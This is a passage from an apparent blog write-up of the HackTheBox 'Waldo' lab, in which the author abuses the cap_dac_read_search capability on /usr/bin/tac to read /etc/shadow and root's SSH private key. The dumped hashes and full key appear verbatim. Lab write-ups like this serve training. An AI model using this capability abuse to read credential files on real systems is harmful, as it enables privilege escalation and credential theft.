monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash

Escalate to root

In monitor’s home dir, we see two binaries logMonitor and another with the same name in the v0.1/ folder but they aren’t identical

monitor@waldo:~/app-dev$ ls -lah
total 2.2M
drwxrwx--- 3 app-dev monitor 4.0K May  3  2018 .
drwxr-x--- 5 root    monitor 4.0K Jul 24  2018 ..
-rwxrwx--- 1 app-dev monitor  14K Jul 24  2018 logMonitor
-r--r----- 1 app-dev monitor  14K May  3  2018 logMonitor.bak
-rw-rw---- 1 app-dev monitor 2.7K May  3  2018 logMonitor.c
-rw-rw---- 1 app-dev monitor  488 May  3  2018 logMonitor.h
-rw-rw---- 1 app-dev monitor 2.2M May  3  2018 logMonitor.h.gch
-rw-rw---- 1 app-dev monitor 6.7K May  3  2018 logMonitor.o
-rwxr----- 1 app-dev monitor  266 May  3  2018 makefile
-r-xr-x--- 1 app-dev monitor  795 May  3  2018 .restrictScript.sh
drwxr-x--- 2 app-dev monitor 4.0K May  3  2018 v0.1
monitor@waldo:~/app-dev$ ls -lah v0.1/
total 24K
drwxr-x--- 2 app-dev monitor 4.0K May  3  2018 .
drwxrwx--- 3 app-dev monitor 4.0K May  3  2018 ..
-r-xr-x--- 1 app-dev monitor  14K May  3  2018 logMonitor-0.1
monitor@waldo ~/app-dev $ diff logMonitor v0.1/logMonitor-0.1
Binary files logMonitor and v0.1/logMonitor-0.1 differ

The C code of what each does is here. It’s notable that the one in v0.1/ works but not the one outside it.

monitor@waldo:~/app-dev$ ./logMonitor -a
Cannot open file
monitor@waldo:~/app-dev/v0.1$ ./logMonitor-0.1 -a
Nov 22 02:50:15 waldo sshd[951]: Accepted publickey for monitor from 127.0.0.1 port 39498 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
Nov 22 02:50:15 waldo sshd[951]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
Nov 22 02:50:15 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
Nov 22 02:50:15 waldo systemd-logind[411]: New session 1 of user monitor.
Nov 22 02:50:17 waldo sshd[960]: Received disconnect from 127.0.0.1 port 39498:11: disconnected by user
Nov 22 02:50:17 waldo sshd[960]: Disconnected from 127.0.0.1 port 39498
Nov 22 02:50:17 waldo sshd[951]: pam_unix(sshd:session): session closed for user monitor
Nov 22 02:50:17 waldo systemd-logind[411]: Removed session 1.
Nov 22 02:50:31 waldo sshd[984]: Accepted publickey for monitor from 127.0.0.1 port 39500 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
Nov 22 02:50:31 waldo sshd[984]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
Nov 22 02:50:31 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
Nov 22 02:50:31 waldo systemd-logind[411]: New session 3 of user monitor.
Nov 22 02:50:34 waldo sshd[993]: Received disconnect from 127.0.0.1 port 39500:11: disconnected by user
Nov 22 02:50:34 waldo sshd[993]: Disconnected from 127.0.0.1 port 39500
Nov 22 02:50:34 waldo sshd[984]: pam_unix(sshd:session): session closed for user monitor
Nov 22 02:50:34 waldo systemd-logind[411]: Removed session 3.
Nov 22 02:50:50 waldo sshd[1017]: Accepted publickey for monitor from 127.0.0.1 port 39502 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
Nov 22 02:50:50 waldo sshd[1017]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
Nov 22 02:50:50 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
Nov 22 02:50:50 waldo systemd-logind[411]: New session 5 of user monitor.
Nov 22 02:50:50 waldo sshd[1026]: Received disconnect from 127.0.0.1 port 39502:11: disconnected by user
Nov 22 02:50:50 waldo sshd[1026]: Disconnected from 127.0.0.1 port 39502
Nov 22 02:50:50 waldo sshd[1017]: pam_unix(sshd:session): session closed for user monitor
Nov 22 02:50:50 waldo systemd-logind[411]: Removed session 5.
Nov 22 02:50:59 waldo sshd[1036]: Accepted publickey for monitor from 127.0.0.1 port 39504 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
Nov 22 02:50:59 waldo sshd[1036]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
Nov 22 02:50:59 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
Nov 22 02:50:59 waldo systemd-logind[411]: New session 7 of user monitor.
Nov 22 03:17:01 waldo CRON[1283]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 22 03:17:01 waldo CRON[1283]: pam_unix(cron:session): session closed for user root

Assuming both are compiled from the same source, why does one work but not the other? Given the user monitor isn’t in the adm group, and thus unable to read log files in /var/log, both binaries should have failed. The answer lies in Linux capabilities and Hack Tricks has a page here. linpeas highlighted this in the script output which is interesting since I typically skip this part of the results (never anymore!).

/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei

[+] Users with capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
cap_dac_read_search monitor

There’s a video here on how to exploit cap_dec_read_search. The reason why the logMonitor binary in v0.1/ works is because it has sudo-like permissions to read any file on the system such as those which require at least an adm group membership and our user monitor is can invoke this power. The script found that /usr/bin/tac command which is basically cat but backwards (prints lines from bottom to top) also has this capability.

monitor@waldo ~/app-dev $ getcap /usr/bin/tac
/usr/bin/tac = cap_dac_read_search+ei

So we could use it to read /etc/shadow for example.

monitor@waldo:~/app-dev$ /usr/bin/tac /etc/shadow
app-dev:$6$RQ4VUGfn$6WYq54MO9AvNFMW.FCRekOBPYJXuI02AqR5lYlwN5/eylTlTWmHlLLvJ4FDp4Nt0A/AX2b3zdrvyEfwf8vSh3/:17654:0:99999:7:::
monitor:$6$IXQ7fATd$RsOewky58ltAbfdjYBHFk9/q5bRcUplLnM9ZHKknVB46smsKn4msCOXDpyYU6xw43rGqJl5fG3sMmEaKhJAJt/:17654:0:99999:7:::
steve:$6$MmXo3me9$zPPUertAwnJYQM8GUya1rzCTKGr/AHtjSG2n3faSeupCCBjoaknUz2YUDStZtvUGWuXonFqXKZF8pXCkezJ.Q.:17653:0:99999:7:::
sshd:*:17653:0:99999:7:::
messagebus:*:17653:0:99999:7:::
avahi-autoipd:*:17653:0:99999:7:::
_apt:*:17653:0:99999:7:::
systemd-bus-proxy:*:17653:0:99999:7:::
systemd-resolve:*:17653:0:99999:7:::
systemd-network:*:17653:0:99999:7:::
systemd-timesync:*:17653:0:99999:7:::
nobody:*:17653:0:99999:7:::
gnats:*:17653:0:99999:7:::
irc:*:17653:0:99999:7:::
list:*:17653:0:99999:7:::
backup:*:17653:0:99999:7:::
www-data:*:17653:0:99999:7:::
proxy:*:17653:0:99999:7:::
uucp:*:17653:0:99999:7:::
news:*:17653:0:99999:7:::
mail:*:17653:0:99999:7:::
lp:*:17653:0:99999:7:::
man:*:17653:0:99999:7:::
games:*:17653:0:99999:7:::
sync:*:17653:0:99999:7:::
sys:*:17653:0:99999:7:::
bin:*:17653:0:99999:7:::
daemon:*:17653:0:99999:7:::
root:$6$tRIbOmog$v7fPb8FKIT0QryKrm7RstojMs.ZXi4xxHz2Uix9lsw52eWtsURc9dwWMOyt4Gpd6QLtVtDnU1NO5KE5gF48r8.:17654:0:99999:7:::

Also root.txt. Unfortunately, short of cracking the root hash above, there’s no way to get a root shell on this box. There’s a private SSH key in root’s .ssh dir, but there’s no authorized_keys so we can’t use it to get a shell (note piping file through tac twice reverts it back to normal)

monitor@waldo /dev/shm$ /usr/bin/tac /root/.ssh/id_rsa | /usr/bin/tac
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAvN1rN9lPfdclMO+ZnoA17rDK5coWWPBMfIadj/PKozv1Ol49
Hql4uEZ6XmLqaV5sfbGaYShuRDJqverunF/c6ntu7AADFozRfkmXxnjkU4P7g8nE
IvNf4ow46MvAdiK3nEBD6TJJpwBjqI/RiVb7xac9uA9XWPAZk5CKw1VDCYzhWdbW
GymtVldQkpmMgE8h1/ymWTIXeMuPp/4k/Gfa0jB0TKplZFpGHZ0mBqsEFAU55t7E
TH9Vx2Otr6alb5C5Ufr3vrmdg5wat9FJYMKnd2hz1ful9GNpOF8cWUIDZYzAHmCO
ZXGiiZmiigagRDWCiiT/Jv0l+nek8ytEvGWiIQIDAQABAoIBAFQbAoFHe/fdVImb
WbzU+a+G+YQlX5hRwq39wLL3bTkOHWHVz8AU1laxxBK+WAd+bi/3ZHl56Mjj7tcO
hR4MLrQZLcdZJgbnxO9JVJalBYEPmHUS6A5sdTnNGhbJjbbONRgXImb55wTAzqCl
EznnC430sS6DXnGT0r/9MV5VXNomJwyPBz0t8yqvS8uJkni0GZE3hGRrd5fFeEgz
fz38bJCkN1RWWVgOiKYJUCZQRJ3eNiPBRChp0+NSY3Z/E4omNc07/xpdOnUyPMSP
sdQ5XKj5AIIW2XEd+S0Ro1IebfU3S0Bl4pCRzrROxJLNQNOedOv57JoEtcVC0Ko4
DRTS2YUCgYEA8YGaIIs9L6b2JmnXe8BKBZb0O61r3EsWvkGAsyzxbIlWNSWOcdW5
eHyHW9Md2J4hDTQbrFDQ7yUDoK+j6fi6V/fndD4IE9NUc1pNhhCB1Nt9nwj28nS7
DgNeNaceHtVrn5Hc9KTUJE7HhBwSffKMM95D/7xzYYxTqM11yh7c/ncCgYEAyDMO
05yq1Q/+t2tC5y3M+DVo4/cz65dppQcOf0MIIanwV7ncgk2Wa5Mw8fdo1FtnCdlR
kDE9rs5RkhoMhWcV9R1lV1xXScHaJik0ljghKrnU3yRNPOXTcKCCnxGhXsx8GjWu
uOV/JA5w4urzbUPRNqagREzeqTZN04aM2Jz9kicCgYBZPoVQJWQU6ePoShCBAIva
CPBz5SAIpg7fe6EtlRwZ+Z5LwXckBdCl/46dliRfWf/ouyrGwI6U8N6oUH+IBIwH
2epEAHBHsz5v6hzfv9XabMm9LTjkW9KL2R7FQN5WkpNUwjgeh5KFYD9GSIFk3W6F
9Eq4hFE26P45UMOIT2Nm/QKBgQCPrWUEpblMs/AAPvCC7THfKKWghbczazUchNX4
q2jYkBe3PeJtebVsevRzkzYewYJPZTHOJCi6ncOY8SzvSK5PfctPSSwz+PXQ0V22
OY5EFZ4ajvkHrYFzoR5dfs+rM2IVhVVhyQLYI60MjcYqMrOhXzBCFFDwa9Kq7jOC
+hhZnQKBgQClMZWr2GmGv7KN/LfhOa0dil3fWtxSdHdwdLlgrKDJslcQUM03sACh
F8mp0GWsEg8kUboEKkyAffG5mcZ/xwZP0MbnmGjIg28DgcbnMsldxOJi3m3VAbC+
x8YIcMgR7/X4fGSV20lsgTVMSH9uNNXD+W3sCJ6Nk+mUBcdUoeFt+w==
-----END RSA PRIVATE KEY-----
monitor@waldo /dev/shm$ /usr/bin/tac /root/.ssh/authorized_keys | /usr/bin/tac
/usr/bin/tac: failed to open '/root/.ssh/authorized_keys' for reading: No such file or directory
monitor@waldo /dev/shm$ /usr/bin/tac /root/.ssh/id_rsa.pub | /usr/bin/tac
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC83Ws32U991yUw75megDXusMrlyhZY8Ex8hp2P88qjO/U6Xj0eqXi4RnpeYuppXmx9sZphKG5EMmq96u6cX9zqe27sAAMWjNF+SZfGeORTg/uDycQi81/ijDjoy8B2IrecQEPpMkmnAGOoj9GJVvvFpz24D1dY8BmTkIrDVUMJjOFZ1tYbKa1WV1CSmYyATyHX/KZZMhd4y4+n/iT8Z9rSMHRMqmVkWkYdnSYGqwQUBTnm3sRMf1XHY62vpqVvkLlR+ve+uZ2DnBq30Ulgwqd3aHPV+6X0Y2k4XxxZQgNljMAeYI5lcaKJmaKKBqBENYKKJP8m/SX6d6TzK0S8ZaIh root@waldo
monitor@waldo /dev/shm$ ssh -i root_id_rsa root@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:YHb7KyiwRxyN62du1P80KmeA9Ap50jgU6JlRaXThs/M.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/monitor/.ssh/known_hosts).
Permission denied (publickey).

Additionally I tried to enumerate docker config but couldn’t.

monitor@waldo ~/app-dev $ docker network ls
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.37/networks: dial unix /var/run/docker.sock: connect: permission denied
monitor@waldo ~/app-dev $ ls -lah /etc/docker/
ls: cannot open directory '/etc/docker/': Permission denied
monitor@waldo ~/app-dev $ ls -lah /var/lib/docker
ls: cannot open directory '/var/lib/docker': Permission denied

Lessons learned

Formatting json output to readable.
Understanding docker network config by smart inference
Restricted shell escape by overwriting executable binary
Linux capabilities

	Ivan on MS08-067 Exploitation & Pa…
	Proving Grounds Idea… on Tips from the PWK labs and PG…
	Proving Grounds Tips… on Tips from the PWK labs and PG…
	David Kennedy on Review of the OSCP
	BBSCute \| Soola… on HackTheBox – Passage